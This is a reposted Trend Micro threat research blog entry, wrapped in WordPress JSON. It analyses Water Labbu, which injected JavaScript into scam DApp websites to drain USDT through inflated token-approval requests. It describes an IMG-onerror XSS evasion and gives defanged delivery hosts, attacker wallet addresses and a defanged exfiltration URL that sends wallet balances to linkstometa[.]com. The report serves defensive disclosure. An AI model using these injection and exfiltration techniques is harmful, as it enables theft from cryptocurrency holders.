{"id":48736,"date":"2022-10-03T00:00:00","date_gmt":"2022-10-03T00:00:00","guid":{"rendered":"urn:uuid:947c5b23-247f-bad5-9fed-a184b4ea6234"},"modified":"2022-10-03T00:00:00","modified_gmt":"2022-10-03T00:00:00","slug":"water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/","title":{"rendered":"Water Labbu Abuses Malicious DApps to Steal Cryptocurrency"},"content":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/22\/water-labbu-cover.png\"><!-- OneTrust Cookies Consent Notice start for trendmicro.com --><!-- OneTrust Cookies Consent Notice end for trendmicro.com --> <head> <meta charset=\"UTF-8\"> <meta name=\"viewport\" content=\"width=device-width\"> <meta name=\"description\" content=\"The parasitic Water Labbu capitalizes on the social engineering schemes of other scammers, injecting malicious JavaScript code into their malicious decentralized application websites to steal cryptocurrency.\"> <meta name=\"robots\" content=\"index,follow\"> <meta name=\"keywords\" content=\"apt &amp; targeted attacks,cyber crime,web,research,articles, news, reports,cyber threats\"> <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge,chrome=1\"> <meta name=\"template\" content=\"article1withouthero\"> <meta property=\"article:published_time\" content=\"2022-10-03\"> <meta property=\"article:tag\" content=\"cyber crime\"> <meta property=\"article:section\" content=\"research\"> <link rel=\"icon\" type=\"image\/ico\" href=\"\/content\/dam\/trendmicro\/favicon.ico\"> <link rel=\"canonical\" href=\"https:\/\/www.trendmicro.com\/en_us\/research\/22\/j\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency.html\"> <title>Water Labbu Abuses Malicious DApps to Steal Cryptocurrency<\/title> <link 
href=\"https:\/\/fonts.googleapis.com\/css?family=Open+Sans:300,300i,400,400i,600\" rel=\"stylesheet\">\n<link href=\"\/\/customer.cludo.com\/css\/296\/1798\/cludo-search.min.css\" type=\"text\/css\" rel=\"stylesheet\"> <link rel=\"stylesheet\" href=\"\/etc.clientlibs\/trendresearch\/clientlibs\/clientlib-trendresearch.min.css\" type=\"text\/css\"> <meta property=\"og:url\" content=\"https:\/\/www.trendmicro.com\/en_us\/research\/22\/j\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency.html\"><br \/>\n<meta property=\"og:title\" content=\"Water Labbu Abuses Malicious DApps to Steal Cryptocurrency\"><br \/>\n<meta property=\"og:description\" content=\"The parasitic Water Labbu capitalizes on the social engineering schemes of other scammers, injecting malicious JavaScript code into their malicious decentralized application websites to steal cryptocurrency.\"><br \/>\n<meta property=\"og:site_name\" content=\"Trend Micro\"><br \/>\n<meta property=\"og:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/22\/water-labbu-cover.png\"><br \/>\n<meta property=\"og:locale\" content=\"en_US\"> <meta name=\"twitter:card\" content=\"summary_large_image\"><br \/>\n<meta name=\"twitter:site\" content=\"@TrendMicro\"><br \/>\n<meta name=\"twitter:title\" content=\"Water Labbu Abuses Malicious DApps to Steal Cryptocurrency\"><br \/>\n<meta name=\"twitter:description\" content=\"The parasitic Water Labbu capitalizes on the social engineering schemes of other scammers, injecting malicious JavaScript code into their malicious decentralized application websites to steal cryptocurrency.\"><br \/>\n<meta name=\"twitter:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/22\/water-labbu-cover.png\"> <\/head> <body class=\"articlepage page basicpage context-business\" id=\"readabilityBody\" readability=\"49.830975698223\"> <!-- Page Scroll: Back to Top --> <a 
id=\"page-scroll\" title=\"VerticalPageScroll\" href=\"javascript:jumpScroll($(this).scrollTop());\"> <span class=\"icon-chevron-up\"><\/span> <\/a> <!-- \/* Data Layer *\/ --> <\/p>\n<div class=\"root responsivegrid\">\n<div class=\"aem-Grid aem-Grid--12 aem-Grid--default--12 \">\n<div class=\"articleBodyNoHero aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"research-layout article container\" role=\"contentinfo\">\n<article class=\"research-layout--wrapper row\" data-article-pageid=\"1899488347\">\n<div class=\"col-xs-12 col-md-12 one-column\">\n<div class=\"col-xs-12 col-md-12\" readability=\"9.2726063829787\">\n<div class=\"article-details\" role=\"heading\" readability=\"38.066489361702\"> <span class=\"article-details__bar\" role=\"img\"><\/span> <\/p>\n<p class=\"article-details__display-tag\">Cyber Crime<\/p>\n<p class=\"article-details__description\">The parasitic Water Labbu capitalizes on the social engineering schemes of other scammers, injecting malicious JavaScript code into their malicious decentralized application websites to steal cryptocurrency.<\/p>\n<p class=\"article-details__author-by\">By: Joseph C Chen, Jaromir Horejsi <time class=\"article-details__date\">October 03, 2022<\/time> <span>Read time:&nbsp;<\/span><span class=\"eta\"><\/span> (<span class=\"words\"><\/span> words) <\/p>\n<\/p><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<hr class=\"research-layout-divider\"> <main class=\"main--content col-xs-12 col-md-8 col-md-push-2\"> <\/p>\n<div class=\"richText\" readability=\"44.311345646438\">\n<div readability=\"34.46437994723\">\n<p>We discovered a threat actor we named Water Labbu that was targeting cryptocurrency scam websites. Typically, cryptocurrency scammers use social engineering techniques, &nbsp;interacting with victims to gain their trust and then manipulating them into providing the permissions needed to transfer cryptocurrency assets. 
While Water Labbu managed to steal cryptocurrencies via a similar method by obtaining access permissions and token allowances from their victim\u2019s wallets, unlike other similar campaigns, they did not use any kind of social engineering \u2014 at least not directly. Instead, Water Labbu lets other scammers use their social engineering tricks to scam unsuspecting victims.<\/p>\n<p>In a parasitic manner, the threat actor compromised the websites of other scammers posing as a decentralized application (<a href=\"https:\/\/www.investopedia.com\/terms\/d\/decentralized-applications-dapps.asp\">DApp<\/a>) and injected malicious JavaScript code into them. The techniques used by the original scammers are detailed in an <a href=\"https:\/\/www.ic3.gov\/Media\/Y2022\/PSA220721\">alert<\/a> released from law enforcement agencies.<\/p>\n<p>When the threat actor finds a victim who has a large amount of cryptocurrency stored in a wallet that is connected to one of the scam websites, the injected JavaScript payload will send a request for permissions. The request is disguised to look like it was being sent from a compromised website and asks for permission (token allowance) to transfer a nearly-unlimited amount of <a href=\"https:\/\/tether.to\/en\/\">USD Tether<\/a> (USDT, which is a <a href=\"https:\/\/en.wikipedia.org\/wiki\/Stablecoin\">stablecoin<\/a> pegged to the US dollar with a value of 1:1) from the target\u2019s wallet.<\/p>\n<p>Water Labbu\u2019s targets are led to believe that the request was originally issued by a DApp, which may cause them to disregard thoroughly reviewing the permission\u2019s details. However, the granted permission does not belong to the crypto addresses of the original scammer, but to another address controlled by Water Labbu. 
The threat actor can then use the obtained permission to drain all USDT funds from the victim\u2019s wallet.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/j\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/water-labbu-infection-chain.jpg\" alt=\"Figure 1. The Water Labbu attack flow\"><figcaption>Figure 1. The Water Labbu attack flow<\/figcaption><\/figure>\n<\/p><\/div>\n<div>\n<div class=\"richText\" readability=\"36.535172413793\">\n<div readability=\"20.87724137931\">\n<p>As of the time of writing, we found 45 fraudulent cryptocurrency-related DApp websites that have been compromised by Water Labbu. These websites show similar styles and themes to the websites used in the \u201c<a href=\"https:\/\/www.reddit.com\/r\/liquiditymining\/comments\/puva25\/lossless_liquidity_mining_pledgefree\/\">Lossless Mining Liquidity Pledge Free<\/a>\u201d scams.<\/p>\n<p>Upon checking the transaction records of the threat actor\u2019s addresses on the Ethereum blockchain, we discovered that they have successfully stolen funds from at least nine different victims for a total amount of at least 316,728 USDT.<\/p>\n<p>In the following sections, we are going to share how the actor used injected JavaScript code to hijack cryptocurrency from fraudulent DApp websites, as well as additional findings that hint at how they may have compromised scammers.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/j\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/water-labbu-part-1-2.png\" alt=\"Figure 2. Screenshot of a compromised fraudulent DApp website\"><figcaption>Figure 2.
Screenshot of a compromised fraudulent DApp website<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"33.5\">\n<div readability=\"12\">\n<p>As we mentioned in the introduction, Water Labbu\u2019s modus involves compromising scam DApp websites and injecting their JavaScript payload into them. The DApp websites seem to be designed via some form of custom template, where the displayed messages in an announcement box are received in JSON format by sending an HTTP request to a given URL. The content of the request (Figure 3) shows a JSON object with a \u201chelper\u201d key containing a few embedded items. The first item is clearly injected and contains an evaluation of the Base64-encoded script.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/j\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/water-labbu-part-1-3.png\" alt=\"Figure 3. Visual example of an announcement box from a scam DApp website\"><figcaption>Figure 3. Visual example of an announcement box from a scam DApp website<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/j\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/water-labbu-part-1-4.png\" alt=\"Figure 4. Displayed data received in JSON format\"><figcaption>Figure 4. 
Displayed data received in JSON format<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"37.079295154185\">\n<div readability=\"20.491189427313\">\n<p>In one of the cases we analyzed, Water Labbu injected an IMG tag to load a Base64-encoded JavaScript payload using the \u201conerror\u201d event, in what is known as an <a href=\"https:\/\/cheatsheetseries.owasp.org\/cheatsheets\/XSS_Filter_Evasion_Cheat_Sheet.html\">XSS evasion technique<\/a>, to bypass Cross Site Scripting (XSS) filters. The injected payload then creates another script element that loads another script from the delivery server <i>tmpmeta[.]com<\/i>. The delivery server then filters victims and delivers different content based on the IP address and the browser User-Agent header (which is used to help determine the victims\u2019 environment).<\/p>\n<p>We noticed the following behavior:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">If the victim loads the script from a mobile device using Android or iOS, it returns the first stage script with cryptocurrency-theft capabilities.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">If the victim loads the script from a desktop running Windows, it returns another script showing a fake Flash update message asking the victim to download a malicious executable file.<\/span><\/li>\n<\/ul>\n<p>It\u2019s worth mentioning that the delivery server implements a mechanism to avoid loading a script multiple times from the same IP address over a short period of time.
If an IP address accessed the delivery server in the last few hours or the type of device the victim uses does not match other required conditions, it will return a simple stealer script that will collect cookie and <a href=\"https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/API\/Window\/localStorage\">LocalStorage<\/a> data and send them back to the delivery server.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/j\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/water-labbu-part-1-5.png\" alt=\"Figure 5. Stealer script that collects cookie and LocalStorage data\"><figcaption>Figure 5. Stealer script that collects cookie and LocalStorage data<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"36.671038251366\">\n<div readability=\"20.265573770492\">\n<h2><span class=\"body-subhead-title\">The cryptocurrency-stealing script: first stage<\/span><\/h2>\n<p>Initially, the <a href=\"https:\/\/web3js.readthedocs.io\/en\/v1.7.5\/\">web3.js<\/a> library is loaded. This provides the first stage script the ability to connect to the victim\u2019s wallet, although the malicious script will communicate with the victim\u2019s wallet only if a victim has their wallet connected to the compromised DApp website. Gaining access to the wallet allows Water Labbu to gather the target\u2019s Ethereum address and balance. The script also interacts with <a href=\"https:\/\/etherscan.io\/token\/0xdac17f958d2ee523a2206206994597c13d831ec7\">Tether USD smart contract<\/a> &nbsp;to receive the victim\u2019s USDT balance. 
If the wallet contains more than 0.001 ETH or more than 1 USDT, it will send the wallet balance information and the wallet address to the information collecting server, <i>linkstometa[.]com<\/i>, via an HTTP request.<\/p>\n<p>The following text shows the request to exfiltrate the wallet balance:<\/p>\n<p><i><span class=\"blockquote\">hxxps[:]\/\/linkstometa[.]com\/data\/?get&amp;s=[%22{ETH balance}%22,%22{USDT balance}%22]&amp;j={Ethereum address}<\/span><\/i><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/j\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/water-labbu-part-1-6.png\" alt=\"Figure 6. Script for collecting wallet balance and the default wallet address (deobfuscated)\"><figcaption>Figure 6. Script for collecting wallet balance and the default wallet address (deobfuscated)<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"34\">\n<div readability=\"13\">\n<h2><span class=\"body-subhead-title\">The cryptocurrency-stealing script: second stage<\/span><\/h2>\n<p>The exfiltration request will return the second stage script once the reported balance has both an ETH balance higher than 0.005 ETH and a USDT token balance higher than 22,000 USDT. Otherwise, it will return an empty payload and leave the victims for other scammers. During the second stage script, the third balance check is performed and the token allowance approval is requested.&nbsp;<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/j\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/water-labbu-part-1-7.png\" alt=\"Figure 7. The script responsible for showing token allowance approval\"><figcaption>Figure 7. 
The script responsible for showing token allowance approval<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"33.245641838352\">\n<div readability=\"12.711568938193\">\n<p>The <a href=\"https:\/\/help.coinbase.com\/en\/wallet\/security\/dapp-permissions-token-approvals\">token approval<\/a> request asks victims to grant permission to a given address to complete transactions and spend cryptocurrency assets. The malicious script requests an approval limit of 10^32 USDT, which is far more than the total available USDT tokens on the blockchain. When the \u201capprove\u201d request is issued, the cryptocurrency wallet application will ask users to review the details of the request before confirmation. If the victim does not carefully check the request details and grants the permissions to Water Labbu\u2019s address, the threat actor will be able to transfer all the USDT from the victim\u2019s wallet.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/j\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/water-labbu-part-1-8.png\" alt=\"Figure 8. The review prompt for the malicious permission requests by the cryptocurrency wallet\"><figcaption>Figure 8.
The review prompt for the malicious permission requests by the cryptocurrency wallet<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"36.689873417722\">\n<div readability=\"27.517405063291\">\n<p>During our monitoring of Water Labbu\u2019s operations, we noticed two addresses being repeatedly used to receive the granted permissions and to transfer the victims\u2019 cryptocurrency assets.<\/p>\n<p>The address, <i><a href=\"https:\/\/etherscan.io\/address\/0xd6ed30a5ecdeaca58f9abf8a0d76e193e1b7818a\">0xd6ed30a5ecdeaca58f9abf8a0d76e193e1b7818a<\/a><\/i>, is the first to receive the token approvals from victims. As of August 2022, the address has successfully used the \u201cTransfer From\u201d method seven times to collect USDT from different addresses, likely belonging to the group\u2019s victims. Funds were then transferred to the second address, <i><a href=\"https:\/\/etherscan.io\/token\/0xdac17f958d2ee523a2206206994597c13d831ec7?a=0x3e9f1d6e244d773360dce4ca88ab3c054f502d51\">0x3e9f1d6e244d773360dce4ca88ab3c054f502d51<\/a><\/i>. The second address has two transactions transferring stolen USDT to two other addresses: &nbsp;<i><a href=\"https:\/\/etherscan.io\/token\/0xdac17f958d2ee523a2206206994597c13d831ec7?a=0x486d08f635b90196e5793725176d9f7ead155fed\">0x486d08f635b90196e5793725176d9f7ead155fed<\/a><\/i> and <i><a href=\"https:\/\/etherscan.io\/token\/0xdac17f958d2ee523a2206206994597c13d831ec7?a=0xfc74d6cfdf6da90ae996c999e12002090bc6d5bf\">0xfc74d6cfdf6da90ae996c999e12002090bc6d5bf<\/a><\/i>.<\/p>\n<p>The address, <a href=\"https:\/\/etherscan.io\/token\/0xdac17f958d2ee523a2206206994597c13d831ec7?a=0xfece995f99549011a88bbb8980bbedd8fada5a35\">0xfece995f99549011a88bbb8980bbedd8fada5a35<\/a>, is a newer one we found inside Water Labbu\u2019s scripts from June 2022. 
This address successfully drained USDT from two addresses, swapping them on the Uniswap cryptocurrency exchange \u2014 first to USD Coin (USDC), then to ETH \u2014 before finally sending the ETH funds to the Tornado Cash mixer.<\/p>\n<p>As of August 2022, the total amount of USDT drained by Water Labbu from nine victims amounts to 316,728 USDT.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/j\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/water-labbu-part-1-9.png\" alt=\"Figure 9. Diagram showing the transactions of stolen USDT\"><figcaption>Figure 9. Diagram showing the transactions of stolen USDT<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"36.821266968326\">\n<div readability=\"19.638009049774\">\n<p>When a target visits the compromised DApp websites using a Windows desktop, the delivery server, <i>tmpmeta[.]com<\/i>, will return a different script that will try to steal cookie and <a href=\"https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/API\/Window\/localStorage\">LocalStorage<\/a> data. It also loads additional scripts from other delivery servers such as <i>whg7[.]cc<\/i> and <i>r8s[.]cc<\/i>. The delivery server, <i>r8s[.]cc<\/i>, returned the latest stage script, creating a fake Flash installation message overlay on the compromised websites. The message, which is in simplified Chinese, states that Flash Player support ended on September 14, 2020, and that downloading the latest version is needed to continue viewing the page.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/j\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/water-labbu-part-1-10.png\" alt=\"Figure 10. 
The script loading sequence on a Windows desktop system\"><figcaption>Figure 10. The script loading sequence on a Windows desktop system<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/j\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/water-labbu-part-1-11.png\" alt=\"Figure 11. The fake Flash Player installation message being overlayed on the compromised website\"><figcaption>Figure 11. The fake Flash Player installation message being overlayed on the compromised website<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/j\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/water-labbu-part-1-12.png\" alt=\"Figure 12. The list of files available for download from the GitHub repository \u201cflashtech9\/Flash\u201d\"><figcaption>Figure 12. The list of files available for download from the GitHub repository \u201cflashtech9\/Flash\u201d<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"41.354001759015\">\n<div readability=\"27.901495162709\">\n<p>Water Labbu has managed to steal cryptocurrency funds by injecting their malicious scripts to fraudulent websites of other scammers, showing a willingness to exploit the methods of other malicious actors for their own ends. Fortunately, traditional best practices for security are still applicable in this situation and can help users avoid the group\u2019s schemes.<\/p>\n<p>Users should be careful of any invitations for investment that originate from untrusted parties. Furthermore, they should not trade cryptocurrency funds on any unknown platform without thoroughly vetting its legitimacy, understanding what it does, and how it operates. 
We suggest that users review the parameters of the transactions (token approval limits) and ensure that they have not been modified or issued by an untrusted party.<\/p>\n<p>In the next blog entry, we are going to share our additional findings related to Water Labbu\u2019s infection chains, which include their successful exploitation techniques and the patching of an ElectronJS-based application used by scammer<\/p>\n<p><span class=\"body-subhead-title\">Indicators of Compromise<\/span><\/p>\n<p>The indicators of compromise for this blog entry can be found <a href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/j\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/IOCs-water-labbu.txt\">here<\/a>.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<section class=\"tag--list\">\n<p>Tags<\/p>\n<\/section>\n<p> <\/main> <\/article>\n<\/div>\n<\/div><\/div>\n<\/div>\n<p> <!-- \/* Core functionality javascripts, absolute URL to leverage Akamai CDN *\/ --> <!--For Modal-start--> <\/p>\n<p> <!--For Modal-end--> <!-- Go to www.addthis.com\/dashboard to customize your tools --> <\/body> Read More <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/22\/j\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>The parasitic Water Labbu capitalizes on the social engineering schemes of other scammers, injecting malicious JavaScript code into their malicious decentralized application websites to steal cryptocurrency.
Read More HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":48737,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[61],"tags":[9546,9510,9521,9511,9509,9535],"class_list":["post-48736","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-trendmicro","tag-trend-micro-research-apttargeted-attacks","tag-trend-micro-research-articles-news-reports","tag-trend-micro-research-cyber-crime","tag-trend-micro-research-cyber-threats","tag-trend-micro-research-research","tag-trend-micro-research-web"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.7 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Water Labbu Abuses Malicious DApps to Steal Cryptocurrency 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Water Labbu Abuses Malicious DApps to Steal Cryptocurrency 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 
100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2022-10-03T00:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/22\/water-labbu-cover.png\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"8 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"Water Labbu Abuses Malicious DApps to Steal 
Cryptocurrency\",\"datePublished\":\"2022-10-03T00:00:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\\\/\"},\"wordCount\":1700,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/10\\\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency.jpg\",\"keywords\":[\"Trend Micro Research : APT&amp;Targeted Attacks\",\"Trend Micro Research : Articles, News, Reports\",\"Trend Micro Research : Cyber Crime\",\"Trend Micro Research : Cyber Threats\",\"Trend Micro Research : Research\",\"Trend Micro Research : Web\"],\"articleSection\":[\"TrendMicro\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\\\/\",\"name\":\"Water Labbu Abuses Malicious DApps to Steal Cryptocurrency 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/10\\\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency.jpg\",\"datePublished\":\"2022-10-03T00:00:00+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & 
Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/10\\\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/10\\\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency.jpg\",\"width\":1619,\"height\":1345},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Trend Micro Research : APT&amp;Targeted Attacks\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/trend-micro-research-apttargeted-attacks\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Water Labbu Abuses Malicious DApps to Steal Cryptocurrency\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report 
